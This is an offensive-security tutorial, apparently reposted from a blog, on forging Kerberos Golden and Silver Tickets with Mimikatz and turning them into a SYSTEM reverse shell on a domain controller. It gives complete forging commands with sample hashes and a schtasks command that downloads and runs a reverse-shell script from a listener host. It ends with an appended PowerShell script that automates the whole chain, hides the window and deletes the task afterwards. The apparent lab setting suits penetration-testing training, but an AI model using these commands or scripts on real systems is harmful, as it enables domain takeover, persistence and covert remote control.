Golden/Silver Ticket
Post taken from https://medium.com/@mohnishdhage/how-to-get-a-reverse-shell-from-golden-silver-ticket-without-metasploit-52a9fc279e32
Golden/Silver Ticket without Metasploit
Golden Ticket
A Golden Ticket is a persistence mechanism: a forged Ticket Granting Ticket (TGT) encrypted and signed with the key of the krbtgt account (its NTLM hash when RC4 is used). Because the KDC trusts any TGT it can decrypt with the krbtgt key, a Golden Ticket can be used to obtain service tickets for any service in the domain while impersonating any user, including one that does not exist, and it stays valid until the krbtgt password is rotated (twice, since the previous key is still accepted).
Once you have the NTLM hash of the krbtgt account, the following Mimikatz command forges a Golden Ticket and injects it into the current logon session. Injecting into your own session with /ptt does not require local admin rights; elevation is only needed to inject into another user's logon session. The privileged step is obtaining the krbtgt hash in the first place:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:somedomainname.local /sid:S-1-5-21-1874506631-3219951593-538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
kerberos::golden — Name of the Mimikatz Module
user — Name of the user for whom we are requesting the TGT (doesn’t need to be a valid name as account validation is not done by the DC until TGT is older than 20 mins)
domain — Name of the target domain
sid — Domain SID (You can use the command Get-DomainSID from PowerView to get this)
krbtgt — NTLM hash of the krbtgt account
id & groups — RID of the user and RIDs of the groups placed in the ticket's PAC (optional; Mimikatz defaults to user 500 and groups 513,512,520,518,519, i.e. Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins and Enterprise Admins)
ptt — Inject the ticket into current PowerShell Session (we can use /ticket to save the ticket for later use)
startoffset — offset in minutes before the ticket becomes valid (0 = right now; optional)
endin — ticket lifetime in minutes (optional; Mimikatz defaults to 10 years, which is far outside the usual 10-hour domain policy and easy to spot, so set it to match the domain as the 600 above does)
renewmax — maximum renewable lifetime in minutes (optional; 10080 = 7 days, the usual domain default)
To check that the ticket was injected into the current logon session, run:
klist
and look for an entry whose Server is krbtgt/<domain> and whose Client is the forged user. This only confirms injection; the DC is not contacted until the ticket is used to request a service ticket, so an invalid forgery only fails at that point.
Silver Ticket
A Silver Ticket, on the other hand, is a forged service ticket (TGS) encrypted with the key of the account that runs the target service (its NTLM hash when RC4 is used; for services such as HOST or CIFS on a server this is the computer account). A Silver Ticket can only be used to access the service whose key it was encrypted with, so it provides limited access, but it is much quieter: the ticket is never presented to the DC, so the DC logs no 4768/4769 events for it, and the only trace is the logon and the activity on the target host itself.
Once we have the NTLM hash of the target service account, the following command forges a Silver Ticket:
Invoke-Mimikatz -Command '"kerberos::golden /domain:somedomainname.local /sid:S-1-5-21-1874506631-3219951593-538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt"'
The Mimikatz module used here is still kerberos::golden, there is no silver module.
service — the service class of the SPN for which the TGS is forged (HOST here; CIFS, HTTP, LDAP, etc. for other services)
rc4 — NTLM hash of the account running the service (for HOST on a DC, the DC's computer account)
Note: A TGS for the HOST service on the target is what allows a task to be scheduled there with schtasks, which is how the reverse shell below is obtained from a Silver Ticket.
Getting Reverse Shell
Step 1: Schedule a weekly task on the target that fetches and runs the reverse shell script. Address the target by hostname, not IP address, so that Kerberos (and therefore the forged ticket) is used instead of NTLM.
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "ABC" /TR "powershell.exe -c 'iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'"
Note: The hosted script must actually call the function with your listener's IP and port (append a line such as Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 443 to the end of Invoke-PowerShellTcp.ps1), the port must match the listener started in Step 2, and the file must be reachable over HTTP at the URL given in /TR.
S — Name of the computer on which the task is to be scheduled
SC — Schedule type
RU — account the task runs as (SYSTEM here)
TN — Name of the task
TR — specify the command to run when the task is running
Step 2: Start a listener
powercat -l -p 443 -v -t 1000
p — port to listen on
t — timeout
Step 3: Run the scheduled task.
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "ABC"
The task name must match the one given to /TN in Step 1. Once you have the shell, delete the task (schtasks /Delete /S <host> /TN "ABC" /F) so the persistence artifact is not left behind.
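The three steps above as one PowerShell script, added here as an example and not taken from the original post. It adds the checks a practitioner wants: that a HOST service ticket for the target is actually in the session before schtasks is called, that task creation succeeded, what the task's last run result was, and cleanup of the task afterwards. It assumes a Golden or Silver Ticket for HOST on the target is already injected, that Invoke-PowerShellTcp.ps1 (Nishang) is served from the listener host, and that powercat is loaded; the function names are chosen here, and the hostname, IP, port and task name are the page's placeholders.

```powershell
# Added example, not code from the original post. Assumes a ticket for
# HOST/<target> is already in this logon session, Invoke-PowerShellTcp.ps1 is
# hosted on the listener box, and powercat is loaded. Values are placeholders.

$TargetHost   = 'dcorp-dc.dollarcorp.moneycorp.local'   # FQDN, never an IP
$ListenerIp   = '172.16.100.14'
$ListenerPort = 443                                      # must match the listener
$TaskName     = 'ABC'

function Assert-HostTicket {
    # Kerberos is only used when the target is addressed by name, and a Silver
    # Ticket only satisfies the SPN it was forged for. If HOST/<fqdn> is not
    # cached, schtasks falls back to NTLM and the forged ticket is never used.
    param([string]$Target)
    $text = (klist 2>&1) -join "`n"
    if ($text -notmatch "(?i)Server:\s+HOST/$([regex]::Escape($Target))\b") {
        throw "No HOST/$Target service ticket in this logon session"
    }
}

function New-ReverseShellTask {
    # Creates the weekly SYSTEM task. The payload downloads the script and then
    # calls the function inline, so the hosted file does not need editing.
    param([string]$Target, [string]$Name, [string]$Ip, [int]$Port)
    $payload = "iex (iwr http://$Ip/Invoke-PowerShellTcp.ps1 -UseBasicParsing); " +
               "Invoke-PowerShellTcp -Reverse -IPAddress $Ip -Port $Port"
    $action  = "powershell.exe -NoP -W Hidden -c '$payload'"
    schtasks /create /S $Target /SC WEEKLY /RU 'NT Authority\SYSTEM' /TN $Name /TR $action /F
    if ($LASTEXITCODE -ne 0) { throw "schtasks /create failed with exit code $LASTEXITCODE" }
}

function Get-TaskLastResult {
    # Reads 'Last Run Result' from the verbose listing: 0 means the last run
    # exited cleanly, 267009 (0x41301) means the task is still running.
    param([string]$Target, [string]$Name)
    $lines = schtasks /query /S $Target /TN $Name /FO LIST /V
    ($lines | Where-Object { $_ -match '^Last Run Result:' }) -replace '^Last Run Result:\s*', ''
}

function Remove-ReverseShellTask {
    # Cleanup: the task is a persistence artifact and should not be left behind.
    param([string]$Target, [string]$Name)
    schtasks /delete /S $Target /TN $Name /F
}

Assert-HostTicket -Target $TargetHost
New-ReverseShellTask -Target $TargetHost -Name $TaskName -Ip $ListenerIp -Port $ListenerPort

# Trigger the task from a background job a few seconds after the listener is up.
# The job is a new process in the same logon session, so it shares the ticket cache.
Start-Job -ScriptBlock {
    param($t, $n) Start-Sleep -Seconds 5; schtasks /run /S $t /TN $n
} -ArgumentList $TargetHost, $TaskName | Out-Null

powercat -l -p $ListenerPort -v -t 1000   # blocks until the shell connects and exits

Get-TaskLastResult -Target $TargetHost -Name $TaskName
Remove-ReverseShellTask -Target $TargetHost -Name $TaskName
```

Note that powercat holds the console until the remote shell disconnects, which is why the task is triggered from a job rather than from a second window as in the original steps; the result check and the cleanup run once the session closes.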
Reference:
schtasks - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks